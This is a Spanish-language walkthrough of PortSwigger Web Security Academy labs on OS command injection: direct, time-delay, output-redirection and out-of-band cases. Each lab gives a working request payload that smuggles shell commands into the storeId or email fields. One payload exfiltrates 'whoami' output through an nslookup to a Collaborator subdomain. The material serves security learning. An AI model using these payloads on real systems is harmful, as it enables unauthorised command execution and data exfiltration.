OS Command Injection
Inyección de comandos del sistema operativo: casos directos, blind con delays, redirección de output y técnicas out-of-band.
Executing arbitrary commands
Lab 1OS command injection, simple case
Interceptar la consulta del botón Check stock con Burp Suite y enviarla al Repeater. Agregar el comando al parámetro storeId usando ; como separador.
productId=2&storeId=1 ; id
Blind OS command injection vulnerabilities
Detecting blind OS command injection using time delays
Lab 2Blind OS command injection with time delays
Interceptar el envío del formulario de feedback. El parámetro vulnerable es email. Usar ping para generar un delay de ~10 segundos.
csrf=TOKEN&name=test&[email protected]||ping+-c+10+127.0.0.1||&subject=test&message=testExploiting blind OS command injection by redirecting output
Lab 4Blind OS command injection with output redirection
Redirigir la salida del comando al directorio /var/www/images/ (accesible vía web). Luego acceder al archivo resultado a través del endpoint de imágenes.
csrf=TOKEN&name=test&email=gato%40gmail.com||whoami>/var/www/images/miau.txt||&subject=test&message=test# Leer resultado:
https://LAB-ID.web-security-academy.net/image?filename=miau.txtExploiting blind OS command injection using out-of-band (OAST) techniques
Lab 5Blind OS command injection with out-of-band interaction
Usar el Burp Collaborator Client para obtener un subdominio. Inyectar un nslookup al dominio del Collaborator para verificar la interacción DNS.
csrf=TOKEN&name=test&email=gato%40gmail.com||nslookup+COLLABORATOR-SUBDOMAIN.burpcollaborator.net||&subject=test&message=test
Lab 6Blind OS command injection with out-of-band data exfiltration
Exfiltrar la salida de un comando como subdominio DNS al Burp Collaborator. Usar backticks para capturar el output de whoami e incluirlo en la consulta DNS.
csrf=TOKEN&name=test&email=gato%40gmail.com||nslookup+`whoami`.COLLABORATOR-SUBDOMAIN.burpcollaborator.net||&subject=test&message=test